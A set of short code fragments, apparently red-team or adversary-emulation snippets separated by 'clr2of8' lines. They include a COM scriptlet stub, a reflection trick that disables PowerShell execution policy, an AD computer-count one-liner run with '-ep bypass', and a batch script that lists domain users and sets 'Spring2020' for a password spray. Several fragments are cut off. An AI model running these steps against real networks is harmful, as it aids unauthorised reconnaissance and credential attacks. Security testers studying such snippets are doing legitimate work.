clr2of8

<?XML version="1.0"?>
<scriptlet>

<registration
    description="Bandit"
    progid="Bandit"
    version="1.00"
    classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
	>

clr2of8

## PowerShell Eventing lets you tail an event log:
## http://powershellcookbook.com/recipe/IMyz/respond-to-automatically-generated-events
$watcher = New-Object System.Diagnostics.Eventing.Reader.EventLogWatcher "Microsoft-Windows-PowerShell/Operational"
Register-ObjectEvent $watcher EventRecordWritten -Action {
    $event = $eventArgs.EventRecord
    if($event.ProcessId -ne $pid)
    {
        ## Save the last event into a variable in the PowerShell sesssion if you want to explore its properties,
        ## as the eventing actions run in their own runspace
        # $GLOBAL:lastEvent = $event

clr2of8

powershell -ep bypass -command "$s=gwmi Win32_ComputerSystem; if (-not $s.PartOfDomain) { $n=-1 } else { $dr='LDAP://';$s.Domain.Split('.') | % { $dr+='DC='+$_+',' }; $dr=$dr.TrimEnd(','); try { $ad=New-Object DirectoryServices.DirectorySearcher(([adsi]$dr),'(objectCategory=computer)',('name')); $n=($ad.FindAll()).Count } catch { $n=-2} };write-host " Hosts count: " $n; "

clr2of8

# from https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/
function Disable-ExecutionPolicy {($ctx = $executioncontext.gettype().getfield("_context","nonpublic,instance").getvalue( $executioncontext)).gettype().getfield("_authorizationManager","nonpublic,instance").setvalue($ctx, (new-object System.Management.Automation.AuthorizationManager "Microsoft.PowerShell"))}
Disable-ExecutionPolicy

clr2of8

echo "Bits Job Executed" > %HOMEPATH%\Desktop\bitsjob.txt

clr2of8

Add-Content $env:USERPROFILE\desktop\bitsjob.txt "Bits job executed"

clr2of8

{
	"name": "AzureCloudBrainStorming",
	"version": "3.0",
	"domain": "mitre-enterprise",
	"description": "",
	"filters": {
		"stages": [
			"act"
		],
		"platforms": [

clr2of8

function setKey($registryPath, $Name, $Value, $Type="DWORD") {

    IF(!(Test-Path $registryPath))
    {

        New-Item -Path $registryPath -Force | Out-Null
         
        New-ItemProperty -Path $registryPath -Name $Name -Value $value -PropertyType $Type -Force | Out-Null
     }

clr2of8

rem Create the users.txt by parsing the "net users /domain" output
del %temp%\1.txt >nul 2>&1 & del %temp%\2.txt >nul 2>&1 & del %temp%\3.txt >nul 2>&1 & del %temp%\users.txt >nul 2>&1
@FOR /F "skip=6 delims=" %a in ('net users /domain ^| findstr /vc:"The command c"') do @set line=%a & @call echo %^line:  =,%  >> %temp%\1.txt
@FOR /F "delims=" %a in (%temp%\1.txt) do @set line=%a & @call echo %^line:, =,% >> %temp%\2.txt
@FOR /F "tokens=1-3 delims=," %n in (%temp%\2.txt) do @echo %n >> %temp%\3.txt & @echo %o >> %temp%\3.txt & @echo %p >> %temp%\3.txt
@FOR /F "tokens=*" %a in ('type %temp%\3.txt ^| findstr /vc:"ECHO is on."') do @echo %a >> %temp%\users.txt
rem Reset the command window title so you can see the progress of the password spray in the title
title Command Prompt
rem Set your password for the spray here
set password=Spring2020

clr2of8

del %temp%\1.txt >nul 2>&1 & del %temp%\2.txt >nul 2>&1 & del %temp%\3.txt >nul 2>&1 & del %temp%\users.txt >nul 2>&1
@FOR /F "skip=6 delims=" %a in ('net users /domain ^| findstr /vc:"The command c"') do @set line=%a & @call echo %^line:  =,%  >> %temp%\1.txt
@FOR /F "delims=" %a in (%temp%\1.txt) do @set line=%a & @call echo %^line:, =,% >> %temp%\2.txt
@FOR /F "tokens=1-3 delims=," %n in (%temp%\2.txt) do @echo %n >> %temp%\3.txt & @echo %o >> %temp%\3.txt & @echo %p >> %temp%\3.txt
@FOR /F "tokens=*" %a in ('type %temp%\3.txt ^| findstr /vc:"ECHO is on."') do @echo %a >> %temp%\users.txt